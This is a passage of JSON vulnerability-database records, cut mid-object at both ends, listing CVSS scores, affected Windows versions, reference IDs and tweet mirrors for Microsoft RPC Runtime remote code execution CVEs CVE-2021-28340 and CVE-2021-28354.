{"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cwe": ["NVD-CWE-noinfo"], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "edition": 2, "enchantments": {"dependencies": {"modified": "2021-04-20T09:36:35", "references": [{"idList": ["MS:CVE-2021-28340"], "type": "mscve"}, {"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}], "rev": 2}, "score": {"modified": "2021-04-20T09:36:35", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1384220372086661125", "text": " NEW: CVE-2021-28340 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/cYXOmXTAuK?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220372086661125", "text": " NEW: CVE-2021-28340 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/cYXOmXTAuK?amp=1"}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28340", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28340"}], "hash": "429b98f18e96563784424b242f49d4ef5a1cce885cfe1f69f4473e9d2663b615", "hashmap": [{"hash": "d8397aaca09c3d41cbbd37f93b216f7e", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "0b502ca27cbe46b330be41a57f67c69e", "key": "cvelist"}, {"hash": "fb0a8e277bd9bb1ee90edd3c37c2caf7", "key": "description"}, {"hash": "21e7f3bc10f56f3d3ef95f1b9e0412cd", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "2edbee9d7c2a69dd022f29b97cdbd95f", "key": "href"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d5b812c11bd119f970b8a32c5b252c9e", "key": "affectedSoftware"}, {"hash": "56dd3b90fdad5434b2e237c2d2c62919", "key": "cpeConfiguration"}, {"hash": "3bf2877e19b91d4143ea460e43ce9041", "key": "cvss2"}, {"hash": "d370d473ba1bd1721d669ef98e2aeebb", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "122bdba5509c507afa2962a93b3d1c93", "key": "cpe"}, {"hash": "797434013b6a54d859a5263bc756e7a6", "key": "cvss3"}, {"hash": "9a4d6b69ea72bb92c154881ed80c5689", "key": "title"}, {"hash": "485552e4c384750c97aa441af2dd710d", "key": "extraReferences"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "84f4f1a8a50a0249fcf4fd36f122c154", "key": "references"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28340", "id": "CVE-2021-28340", "immutableFields": [], "lastseen": "2021-04-20T09:36:35", "modified": "2021-04-19T18:45:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28340"], "reporter": "cve@mitre.org", "title": "CVE-2021-28340", "type": "cve", "viewCount": 1}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 2, "lastseen": "2021-04-20T09:36:35"}], "edition": 3, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "d5b812c11bd119f970b8a32c5b252c9e"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "122bdba5509c507afa2962a93b3d1c93"}, {"key": "cpe23", "hash": "d8397aaca09c3d41cbbd37f93b216f7e"}, {"key": "cpeConfiguration", "hash": "64c56abb30602eab96958881fd107551"}, {"key": "cvelist", "hash": "0b502ca27cbe46b330be41a57f67c69e"}, {"key": "cvss", "hash": "0187fd86f792b6c1e0077d0f69d0ed79"}, {"key": "cvss2", "hash": "3bf2877e19b91d4143ea460e43ce9041"}, {"key": "cvss3", "hash": "797434013b6a54d859a5263bc756e7a6"}, {"key": "cwe", "hash": "d370d473ba1bd1721d669ef98e2aeebb"}, {"key": "description", "hash": "fb0a8e277bd9bb1ee90edd3c37c2caf7"}, {"key": "extraReferences", "hash": "485552e4c384750c97aa441af2dd710d"}, {"key": "href", "hash": "2edbee9d7c2a69dd022f29b97cdbd95f"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "21e7f3bc10f56f3d3ef95f1b9e0412cd"}, {"key": "published", "hash": "466c447b6119a8be9494fae20b17c9a1"}, {"key": "references", "hash": "84f4f1a8a50a0249fcf4fd36f122c154"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "9a4d6b69ea72bb92c154881ed80c5689"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "7ec19cbb4efb80b6cd343cab5c493476cb878f6ab4a834bf61d19d7e7f010ddd", "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2021-28340/"]}, {"type": "mscve", "idList": ["MS:CVE-2021-28340"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001330.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001335.NASL"]}, {"type": "kaspersky", "idList": ["KLA12139", "KLA12142"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}], "modified": "2021-04-28T11:49:18", "rev": 2}, "score": {"value": 3.6, "vector": "NONE", "modified": "2021-04-28T11:49:18", "rev": 2}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1384220372086661125", "text": " NEW: CVE-2021-28340 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/cYXOmXTAuK?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220372086661125", "text": " NEW: CVE-2021-28340 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/cYXOmXTAuK?amp=1"}]}}, "objectVersion": "1.5", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28340", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28340"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "scheme": null}, {"id": "CVE-2021-28354", "bulletinFamily": "NVD", "title": "CVE-2021-28354", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "published": "2021-04-13T20:15:00", "modified": "2021-04-16T21:08:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28354", "reporter": "secure@microsoft.com", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28354"], "cvelist": ["CVE-2021-28354"], "immutableFields": [], "type": "cve", "lastseen": "2021-04-28T11:49:18", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2021-28354"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cwe": ["NVD-CWE-noinfo"], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "edition": 2, "enchantments": {"dependencies": {"modified": "2021-04-17T09:58:44", "references": [{"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-28354"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-17T09:58:44", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 4, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1383170976171618308", "text": " NEW: CVE-2021-28354 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/3Xk4PCuMwB?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383170976171618308", "text": " NEW: CVE-2021-28354 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/3Xk4PCuMwB?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383193614709313538", "text": " NEW: CVE-2021-28354 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/3Xk4PCuMwB?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383193614709313538", "text": " NEW: CVE-2021-28354 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/3Xk4PCuMwB?amp=1"}]}}, 